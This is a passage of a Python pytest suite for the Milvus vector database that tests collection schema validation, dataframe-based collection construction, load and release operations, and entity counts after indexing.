@pytest.mark.tags(CaseLabel.L2)
def test_collection_auto_id_false_non_primary(self):
"""
target: test collection set auto_id in non-primary field
method: set auto_id=True in non-primary field
expected: verify schema auto_id is False
"""
self._connect()
int_field_one = cf.gen_int64_field(is_primary=True)
int_field_two = cf.gen_int64_field(name='int2', auto_id=False)
fields = [int_field_one, int_field_two, cf.gen_float_vec_field()]
schema, _ = self.collection_schema_wrap.init_collection_schema(fields)
assert not schema.auto_id
@pytest.mark.tags(CaseLabel.L2)
def test_collection_auto_id_inconsistent(self):
"""
target: test collection auto_id with both collection schema and field schema
method: 1.set primary field auto_id=True in field schema 2.set auto_id=False in collection schema
expected: raise exception
"""
self._connect()
int_field = cf.gen_int64_field(is_primary=True, auto_id=True)
vec_field = cf.gen_float_vec_field(name='vec')
error = {ct.err_code: 0, ct.err_msg: "The auto_id of the collection is inconsistent with "
"the auto_id of the primary key field"}
self.collection_schema_wrap.init_collection_schema([int_field, vec_field], auto_id=False,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("auto_id", [True, False])
def test_collection_auto_id_consistent(self, auto_id):
"""
target: test collection auto_id with both collection schema and field schema
method: set auto_id=True/False both field and schema
expected: verify auto_id
"""
self._connect()
int_field = cf.gen_int64_field(is_primary=True, auto_id=auto_id)
vec_field = cf.gen_float_vec_field(name='vec')
schema, _ = self.collection_schema_wrap.init_collection_schema([int_field, vec_field], auto_id=auto_id)
assert schema.auto_id == auto_id
@pytest.mark.tags(CaseLabel.L2)
def test_collection_auto_id_none_in_field(self):
"""
target: test collection with auto_id is None
method: set auto_id=None
expected: raise exception
"""
self._connect()
error = {ct.err_code: 0, ct.err_msg: "Param auto_id must be bool type"}
self.field_schema_wrap.init_field_schema(name=ct.default_int64_field_name, dtype=DataType.INT64,
is_primary=True,
auto_id=None, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("auto_id", ct.get_invalid_strs)
def test_collection_invalid_auto_id(self, auto_id):
"""
target: test collection with invalid auto_id
method: define field with auto_id=non-bool
expected: raise exception
"""
self._connect()
int_field = cf.gen_int64_field(is_primary=True)
vec_field = cf.gen_float_vec_field(name='vec')
error = {ct.err_code: 0, ct.err_msg: "Param auto_id must be bool type"}
self.collection_schema_wrap.init_collection_schema([int_field, vec_field], auto_id=auto_id,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_collection_multi_fields_auto_id(self):
"""
target: test collection auto_id with multi fields
method: specify auto_id=True for multi int64 fields
expected: todo raise exception
"""
self._connect()
error = {ct.err_code: 0, ct.err_msg: "auto_id can only be specified on the primary key field"}
cf.gen_int64_field(is_primary=True, auto_id=True)
self.field_schema_wrap.init_field_schema(name="int", dtype=DataType.INT64, auto_id=True,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("dtype", [DataType.FLOAT_VECTOR, DataType.BINARY_VECTOR])
def test_collection_vector_without_dim(self, dtype):
"""
target: test collection without dimension
method: define vector field without dim
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
float_vec_field, _ = self.field_schema_wrap.init_field_schema(name="vec", dtype=dtype)
schema = cf.gen_collection_schema(fields=[cf.gen_int64_field(is_primary=True), float_vec_field])
error = {ct.err_code: 1, ct.err_msg: "dimension is not defined in field type params"}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.xfail(reason="exception not Milvus Exception")
def test_collection_vector_invalid_dim(self, get_invalid_dim):
"""
target: test collection with invalid dimension
method: define float-vec field with invalid dimension
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
float_vec_field = cf.gen_float_vec_field(dim=get_invalid_dim)
schema = cf.gen_collection_schema(fields=[cf.gen_int64_field(is_primary=True), float_vec_field])
error = {ct.err_code: 1, ct.err_msg: f'invalid dim: {get_invalid_dim}'}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("dim", [-1, 0, 32769])
def test_collection_vector_out_bounds_dim(self, dim):
"""
target: test collection with out of bounds dim
method: invalid dim -1 and 32759
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
float_vec_field = cf.gen_float_vec_field(dim=dim)
schema = cf.gen_collection_schema(fields=[cf.gen_int64_field(is_primary=True), float_vec_field])
error = {ct.err_code: 1, ct.err_msg: "invalid dimension: {}. should be in range 1 ~ 32768".format(dim)}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_non_vector_field_dim(self):
"""
target: test collection with dim for non-vector field
method: define int64 field with dim
expected: no exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
int_field, _ = self.field_schema_wrap.init_field_schema(name=ct.default_int64_field_name, dtype=DataType.INT64,
dim=ct.default_dim)
float_vec_field = cf.gen_float_vec_field()
schema = cf.gen_collection_schema(fields=[int_field, float_vec_field],
primary_field=ct.default_int64_field_name)
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
@pytest.mark.tags(CaseLabel.L1)
def test_collection_desc(self):
"""
target: test collection with description
method: create with description
expected: assert default description
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
schema = cf.gen_default_collection_schema(description=ct.collection_desc)
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.xfail(reason="exception not Milvus Exception")
def test_collection_none_desc(self):
"""
target: test collection with none description
method: create with none description
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
schema = cf.gen_default_collection_schema(description=None)
error = {ct.err_code: 1, ct.err_msg: "None has type NoneType, but expected one of: bytes, unicode"}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_collection_long_desc(self):
"""
target: test collection with long desc
method: create with long desc
expected:
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
desc = "a".join("a" for _ in range(256))
schema = cf.gen_default_collection_schema(description=desc)
self.collection_wrap.init_collection(c_name, schema=schema,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
@pytest.mark.tags(CaseLabel.L0)
def test_collection_binary(self):
"""
target: test collection with binary-vec
method: create collection with binary field
expected: assert binary field
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
self.collection_wrap.init_collection(c_name, schema=default_binary_schema,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_binary_schema})
assert c_name in self.utility_wrap.list_collections()[0]
@pytest.mark.tag(CaseLabel.L0)
def test_collection_shards_num_with_default_value(self):
"""
target:test collection with shards_num
method:create collection with shards_num
expected: no exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
self.collection_wrap.init_collection(c_name, schema=default_schema, shards_num=default_shards_num,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_shards_num: default_shards_num})
assert c_name in self.utility_wrap.list_collections()[0]
@pytest.mark.tag(CaseLabel.L0)
@pytest.mark.parametrize("shards_num", [-256, 0, 10, 256])
def test_collection_shards_num_with_not_default_value(self, shards_num):
"""
target:test collection with shards_num
method:create collection with not default shards_num
expected: no exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
self.collection_wrap.init_collection(c_name, schema=default_schema, shards_num=shards_num,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_shards_num: shards_num})
assert c_name in self.utility_wrap.list_collections()[0]
@pytest.mark.tag(CaseLabel.L2)
def test_collection_shards_num_with_error_type(self):
"""
target:test collection with error type shards_num
method:create collection with error type shards_num
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
error_type_shards_num = "2" # suppose to be int rather than str
error = {ct.err_code: -1, ct.err_msg: f"expected one of: int, long"}
self.collection_wrap.init_collection(c_name, schema=default_schema, shards_num=error_type_shards_num,
check_task=CheckTasks.err_res,
check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_create_collection_maximum_fields(self):
"""
target: test create collection with maximum fields
method: create collection with maximum field number
expected: no exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
int_fields = []
limit_num = ct.max_field_num - 2
for i in range(limit_num):
int_field_name = cf.gen_unique_str("field_name")
field = cf.gen_int64_field(name=int_field_name)
int_fields.append(field)
int_fields.append(cf.gen_float_vec_field())
int_fields.append(cf.gen_int64_field(is_primary=True))
schema = cf.gen_collection_schema(fields=int_fields)
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
@pytest.mark.tags(CaseLabel.L2)
def test_create_collection_over_maximum_fields(self):
"""
target: Test create collection with more than the maximum fields
method: create collection with more than the maximum field number
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
int_fields = []
limit_num = ct.max_field_num
for i in range(limit_num):
int_field_name = cf.gen_unique_str("field_name")
field = cf.gen_int64_field(name=int_field_name)
int_fields.append(field)
int_fields.append(cf.gen_float_vec_field())
int_fields.append(cf.gen_int64_field(is_primary=True))
schema = cf.gen_collection_schema(fields=int_fields)
error = {ct.err_code: 1, ct.err_msg: "maximum field's number should be limited to 256"}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
class TestCollectionOperation(TestcaseBase):
"""
******************************************************************
The following cases are used to test collection interface operations
******************************************************************
"""
# def teardown_method(self):
# if self.self.collection_wrap is not None and self.self.collection_wrap.collection is not None:
# self.self.collection_wrap.drop()
@pytest.mark.tags(CaseLabel.L2)
def test_collection_without_connection(self):
"""
target: test collection without connection
method: 1.create collection after connection removed
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
self.connection_wrap.remove_connection(ct.default_alias)
res_list, _ = self.connection_wrap.list_connections()
assert ct.default_alias not in res_list
error = {ct.err_code: 0, ct.err_msg: 'should create connect first'}
self.collection_wrap.init_collection(c_name, schema=default_schema,
check_task=CheckTasks.err_res, check_items=error)
assert self.collection_wrap.collection is None
@pytest.mark.tags(CaseLabel.L1)
def test_collection_multi_create_drop(self):
"""
target: test cycle creation and deletion of multiple collections
method: in a loop, collections are created and deleted sequentially
expected: no exception
"""
self._connect()
c_num = 20
for _ in range(c_num):
c_name = cf.gen_unique_str(prefix)
self.collection_wrap.init_collection(c_name, schema=default_schema,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
self.collection_wrap.drop()
assert c_name not in self.utility_wrap.list_collections()[0]
@pytest.mark.tags(CaseLabel.L1)
def test_collection_dup_name_drop(self):
"""
target: test collection with dup name, and drop
method: 1. two dup name collection object
2. one object drop collection
expected: collection dropped
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
self.collection_wrap.init_collection(c_name, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
self.collection_wrap.drop()
assert not self.utility_wrap.has_collection(c_name)[0]
error = {ct.err_code: 1, ct.err_msg: f'HasPartition failed: can\'t find collection: {c_name}'}
collection_w.has_partition("p", check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_after_drop(self):
"""
target: test create collection after create and drop
method: 1. create a 2. drop a 3, re-create a
expected: no exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
collection_w.drop()
assert not self.utility_wrap.has_collection(collection_w.name)[0]
self.init_collection_wrap(name=c_name, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
assert self.utility_wrap.has_collection(c_name)[0]
@pytest.mark.tags(CaseLabel.L1)
def test_collection_all_datatype_fields(self):
"""
target: test create collection with all dataType fields
method: create collection with all dataType schema
expected: create successfully
"""
self._connect()
fields = []
for k, v in DataType.__members__.items():
if v and v != DataType.UNKNOWN and v != DataType.FLOAT_VECTOR and v != DataType.BINARY_VECTOR:
field, _ = self.field_schema_wrap.init_field_schema(name=k.lower(), dtype=v)
fields.append(field)
fields.append(cf.gen_float_vec_field())
schema, _ = self.collection_schema_wrap.init_collection_schema(fields,
primary_field=ct.default_int64_field_name)
c_name = cf.gen_unique_str(prefix)
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
@pytest.mark.tags(CaseLabel.L2)
def test_load_collection_after_load_partition(self):
"""
target: test release the partition after load collection
method: load collection and load the partition
expected: raise exception
"""
self._connect()
collection_w = self.init_collection_wrap()
partition_w1 = self.init_partition_wrap(collection_w)
partition_w1.insert(cf.gen_default_list_data())
collection_w.load()
error = {ct.err_code: 1, ct.err_msg: f'load the partition after load collection is not supported'}
partition_w1.load(check_task=CheckTasks.err_res,
check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_load_collection_release_partition(self):
"""
target: test release the partition after load collection
method: load collection and release the partition
expected: raise exception
"""
self._connect()
collection_w = self.init_collection_wrap()
partition_w1 = self.init_partition_wrap(collection_w)
partition_w1.insert(cf.gen_default_list_data())
collection_w.load()
error = {ct.err_code: 1, ct.err_msg: f'releasing the partition after load collection is not supported'}
partition_w1.release(check_task=CheckTasks.err_res,
check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_load_collection_after_release_collection(self):
"""
target: test release the collection after load collection
method: load collection and release the collection
expected: no exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
collection_w.insert(cf.gen_default_list_data())
collection_w.load()
collection_w.release()
class TestCollectionDataframe(TestcaseBase):
"""
******************************************************************
The following cases are used to test construct_from_dataframe
******************************************************************
"""
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_non_df(self, request):
if request.param is None:
pytest.skip("skip None")
yield request.param
@pytest.mark.tags(CaseLabel.L0)
def test_construct_from_dataframe(self):
"""
target: test collection with dataframe data
method: create collection and insert with dataframe
expected: collection num entities equal to nb
"""
conn = self._connect()
c_name = cf.gen_unique_str(prefix)
df = cf.gen_default_dataframe_data(ct.default_nb)
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
conn.flush([c_name])
assert self.collection_wrap.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L0)
def test_construct_from_binary_dataframe(self):
"""
target: test binary collection with dataframe
method: create binary collection with dataframe
expected: collection num entities equal to nb
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df, _ = cf.gen_default_binary_dataframe_data(nb=ct.default_nb)
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_binary_schema})
assert self.collection_wrap.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L2)
def test_construct_from_none_dataframe(self):
"""
target: test create collection by empty dataframe
method: invalid dataframe type create collection
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
error = {ct.err_code: 0, ct.err_msg: "Dataframe can not be None."}
self.collection_wrap.construct_from_dataframe(c_name, None, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_construct_from_dataframe_only_column(self):
"""
target: test collection with dataframe only columns
method: dataframe only has columns
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = pd.DataFrame(columns=[ct.default_int64_field_name, ct.default_float_vec_field_name])
error = {ct.err_code: 0, ct.err_msg: "Cannot infer schema from empty dataframe"}
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_construct_from_inconsistent_dataframe(self):
"""
target: test collection with data inconsistent
method: create and insert with inconsistent data
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
# one field different type df
mix_data = [(1, 2., [0.1, 0.2]), (2, 3., 4)]
df = pd.DataFrame(data=mix_data, columns=list("ABC"))
error = {ct.err_code: 0, ct.err_msg: "The data in the same column must be of the same type"}
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field='A', check_task=CheckTasks.err_res,
check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_construct_from_non_dataframe(self, get_non_df):
"""
target: test create collection by invalid dataframe
method: non-dataframe type create collection
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
error = {ct.err_code: 0, ct.err_msg: "Data type must be pandas.DataFrame."}
df = get_non_df
self.collection_wrap.construct_from_dataframe(c_name, df, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_construct_from_data_type_dataframe(self):
"""
target: test collection with invalid dataframe
method: create with invalid dataframe
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = pd.DataFrame({"date": pd.date_range('20210101', periods=3), ct.default_int64_field_name: [1, 2, 3]})
error = {ct.err_code: 0, ct.err_msg: "Cannot infer schema from empty dataframe."}
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_construct_from_invalid_field_name(self):
"""
target: test collection with invalid field name
method: create with invalid field name dataframe
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = pd.DataFrame({'%$#': cf.gen_vectors(3, 2), ct.default_int64_field_name: [1, 2, 3]})
error = {ct.err_code: 1, ct.err_msg: "Invalid field name"}
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_construct_none_primary_field(self):
"""
target: test collection with none primary field
method: primary_field is none
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = cf.gen_default_dataframe_data(ct.default_nb)
error = {ct.err_code: 0, ct.err_msg: "Schema must have a primary key field."}
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=None,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_construct_not_existed_primary_field(self):
"""
target: test collection with not existed primary field
method: primary field not existed
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = cf.gen_default_dataframe_data(ct.default_nb)
error = {ct.err_code: 0, ct.err_msg: "Primary field must in dataframe."}
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=c_name,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_construct_with_none_auto_id(self):
"""
target: test construct with non-int64 as primary field
method: non-int64 as primary field
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = cf.gen_default_dataframe_data(ct.default_nb)
error = {ct.err_code: 0, ct.err_msg: "Param auto_id must be bool type"}
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
auto_id=None, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_construct_auto_id_true_insert(self):
"""
target: test construct with true auto_id
method: auto_id=True and insert values
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = cf.gen_default_dataframe_data(nb=100)
error = {ct.err_code: 0, ct.err_msg: "Auto_id is True, primary field should not have data."}
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
auto_id=True, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_construct_auto_id_true_no_insert(self):
"""
target: test construct with true auto_id
method: auto_id=True and not insert ids(primary fields all values are None)
expected: verify num entities
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = cf.gen_default_dataframe_data()
# df.drop(ct.default_int64_field_name, axis=1, inplace=True)
df[ct.default_int64_field_name] = None
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
auto_id=True)
assert self.collection_wrap.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L2)
def test_construct_none_value_auto_id_true(self):
"""
target: test construct with none value, auto_id
method: df primary field with none value, auto_id=true
expected: todo
"""
self._connect()
nb = 100
df = cf.gen_default_dataframe_data(nb)
df.iloc[:, 0] = numpy.NaN
res, _ = self.collection_wrap.construct_from_dataframe(cf.gen_unique_str(prefix), df,
primary_field=ct.default_int64_field_name, auto_id=True)
mutation_res = res[1]
assert cf._check_primary_keys(mutation_res.primary_keys, 100)
assert self.collection_wrap.num_entities == nb
@pytest.mark.tags(CaseLabel.L1)
def test_construct_auto_id_false(self):
"""
target: test construct with false auto_id
method: auto_id=False, primary_field correct
expected: verify auto_id
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = cf.gen_default_dataframe_data(ct.default_nb)
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
auto_id=False)
assert not self.collection_wrap.schema.auto_id
assert self.collection_wrap.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L2)
def test_construct_none_value_auto_id_false(self):
"""
target: test construct with none value, auto_id
method: df primary field with none value, auto_id=false
expected: raise exception
"""
self._connect()
nb = 100
df = cf.gen_default_dataframe_data(nb)
df.iloc[:, 0] = numpy.NaN
error = {ct.err_code: 0, ct.err_msg: "Primary key type must be DataType.INT64"}
self.collection_wrap.construct_from_dataframe(cf.gen_unique_str(prefix), df,
primary_field=ct.default_int64_field_name, auto_id=False,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_construct_auto_id_false_same_values(self):
"""
target: test construct with false auto_id and same value
method: auto_id=False, primary field same values
expected: verify num entities
"""
self._connect()
nb = 100
df = cf.gen_default_dataframe_data(nb)
df.iloc[1:, 0] = 1
res, _ = self.collection_wrap.construct_from_dataframe(cf.gen_unique_str(prefix), df,
primary_field=ct.default_int64_field_name, auto_id=False)
collection_w = res[0]
assert collection_w.num_entities == nb
mutation_res = res[1]
assert mutation_res.primary_keys == df[ct.default_int64_field_name].values.tolist()
@pytest.mark.tags(CaseLabel.L1)
def test_construct_auto_id_false_negative_values(self):
"""
target: test construct with negative values
method: auto_id=False, primary field values is negative
expected: verify num entities
"""
self._connect()
nb = 100
df = cf.gen_default_dataframe_data(nb)
new_values = pd.Series(data=[i for i in range(0, -nb, -1)])
df[ct.default_int64_field_name] = new_values
self.collection_wrap.construct_from_dataframe(cf.gen_unique_str(prefix), df,
primary_field=ct.default_int64_field_name, auto_id=False)
assert self.collection_wrap.num_entities == nb
@pytest.mark.tags(CaseLabel.L1)
def test_construct_from_dataframe_dup_name(self):
"""
target: test collection with dup name and insert dataframe
method: create collection with dup name, none schema, dataframe
expected: two collection object is correct
"""
conn = self._connect()
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, primary_field=ct.default_int64_field_name,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
df = cf.gen_default_dataframe_data(ct.default_nb)
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
conn.flush([collection_w.name])
assert collection_w.num_entities == ct.default_nb
assert collection_w.num_entities == self.collection_wrap.num_entities
class TestCollectionCount:
"""
params means different nb, the nb value may trigger merge, or not
"""
@pytest.fixture(
scope="function",
params=[
1,
1000,
2001
],
)
def insert_count(self, request):
yield request.param
"""
generate valid create_index params
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
return request.param
@pytest.mark.tags(CaseLabel.L2)
def test_count_without_connection(self, collection, dis_connect):
"""
target: test count_entities, without connection
method: calling count_entities with correct params, with a disconnected instance
expected: count_entities raise exception
"""
with pytest.raises(Exception) as e:
dis_connect.count_entities(collection)
@pytest.mark.tags(CaseLabel.L2)
def test_collection_count_no_vectors(self, connect, collection):
"""
target: test collection rows_count is correct or not, if collection is empty
method: create collection and no vectors in it,
assert the value returned by count_entities method is equal to 0
expected: the count is equal to 0
"""
stats = connect.get_collection_stats(collection)
assert stats[row_count] == 0
class TestCollectionCountIP:
"""
params means different nb, the nb value may trigger merge, or not
"""
@pytest.fixture(
scope="function",
params=[
1,
1000,
2001
],
)
def insert_count(self, request):
yield request.param
"""
generate valid create_index params
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
request.param.update({"metric_type": "IP"})
return request.param
@pytest.mark.tags(CaseLabel.L1)
def test_collection_count_after_index_created(self, connect, collection, get_simple_index, insert_count):
"""
target: test count_entities, after index have been created
method: add vectors in db, and create index, then calling count_entities with correct params
expected: count_entities raise exception
"""
entities = gen_entities(insert_count)
connect.insert(collection, entities)
connect.flush([collection])
connect.create_index(collection, default_float_vec_field_name, get_simple_index)
stats = connect.get_collection_stats(collection)
assert stats[row_count] == insert_count
class TestCollectionCountBinary:
"""
params means different nb, the nb value may trigger merge, or not
"""
@pytest.fixture(
scope="function",
params=[
1,
1000,
2001
],
)
def insert_count(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_jaccard_index(self, request, connect):
request.param["metric_type"] = "JACCARD"
return request.param
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_hamming_index(self, request, connect):
request.param["metric_type"] = "HAMMING"
return request.param
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_substructure_index(self, request, connect):
request.param["metric_type"] = "SUBSTRUCTURE"
return request.param
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_superstructure_index(self, request, connect):
request.param["metric_type"] = "SUPERSTRUCTURE"
return request.param
# TODO: need to update and enable
@pytest.mark.tags(CaseLabel.L1)
def test_collection_count_after_index_created_A(self, connect, binary_collection, get_hamming_index, insert_count):
"""
target: test count_entities, after index have been created
method: add vectors in db, and create index, then calling count_entities with correct params
expected: count_entities equals entities count just inserted
"""
raw_vectors, entities = gen_binary_entities(insert_count)
connect.insert(binary_collection, entities)
connect.flush([binary_collection])
# connect.load_collection(binary_collection)
connect.create_index(binary_collection, default_binary_vec_field_name, get_hamming_index)
stats = connect.get_collection_stats(binary_collection)
assert stats[row_count] == insert_count
@pytest.mark.tags(CaseLabel.L2)
def test_collection_count_no_entities(self, connect, binary_collection):
"""
target: test collection rows_count is correct or not, if collection is empty
method: create collection and no vectors in it,
assert the value returned by count_entities method is equal to 0
expected: the count is equal to 0
"""
stats = connect.get_collection_stats(binary_collection)
assert stats[row_count] == 0
class TestCollectionMultiCollections:
"""
params means different nb, the nb value may trigger merge, or not
"""
@pytest.fixture(
scope="function",
params=[
1,
1000,
2001
],
)
def insert_count(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L0)
def test_collection_count_multi_collections_l2(self, connect, insert_count):
"""
target: test collection rows_count is correct or not with multiple collections of L2
method: create collection and add entities in it,
assert the value returned by count_entities method is equal to length of entities
expected: the count is equal to the length of entities
"""
entities = gen_entities(insert_count)
collection_list = []
collection_num = 20
for i in range(collection_num):
collection_name = gen_unique_str(uid_count)
collection_list.append(collection_name)
connect.create_collection(collection_name, cons.default_fields)
connect.insert(collection_name, entities)
connect.flush(collection_list)
for i in range(collection_num):
stats = connect.get_collection_stats(collection_list[i])
assert stats[row_count] == insert_count
connect.drop_collection(collection_list[i])
@pytest.mark.tags(CaseLabel.L2)
def test_collection_count_multi_collections_binary(self, connect, binary_collection, insert_count):
"""
target: test collection rows_count is correct or not with multiple collections of JACCARD
method: create collection and add entities in it,
assert the value returned by count_entities method is equal to length of entities
expected: the count is equal to the length of entities
"""
raw_vectors, entities = gen_binary_entities(insert_count)
connect.insert(binary_collection, entities)
collection_list = []
collection_num = 20
for i in range(collection_num):
collection_name = gen_unique_str(uid_count)
collection_list.append(collection_name)
connect.create_collection(collection_name, cons.default_binary_fields)
connect.insert(collection_name, entities)
connect.flush(collection_list)
for i in range(collection_num):
stats = connect.get_collection_stats(collection_list[i])
assert stats[row_count] == insert_count
connect.drop_collection(collection_list[i])
@pytest.mark.tags(CaseLabel.L2)
def test_collection_count_multi_collections_mix(self, connect):
"""
target: test collection rows_count is correct or not with multiple collections of JACCARD
method: create collection and add entities in it,
assert the value returned by count_entities method is equal to length of entities
expected: the count is equal to the length of entities
"""
collection_list = []
collection_num = 20
for i in range(0, int(collection_num / 2)):
collection_name = gen_unique_str(uid_count)
collection_list.append(collection_name)
connect.create_collection(collection_name, cons.default_fields)
connect.insert(collection_name, cons.default_entities)
for i in range(int(collection_num / 2), collection_num):
collection_name = gen_unique_str(uid_count)
collection_list.append(collection_name)
connect.create_collection(collection_name, cons.default_binary_fields)
res = connect.insert(collection_name, cons.default_binary_entities)
connect.flush(collection_list)
for i in range(collection_num):
stats = connect.get_collection_stats(collection_list[i])
assert stats[row_count] == default_nb
connect.drop_collection(collection_list[i])
class TestGetCollectionStats:
"""
******************************************************************
The following cases are used to test `collection_stats` function
******************************************************************
"""
@pytest.fixture(
scope="function",
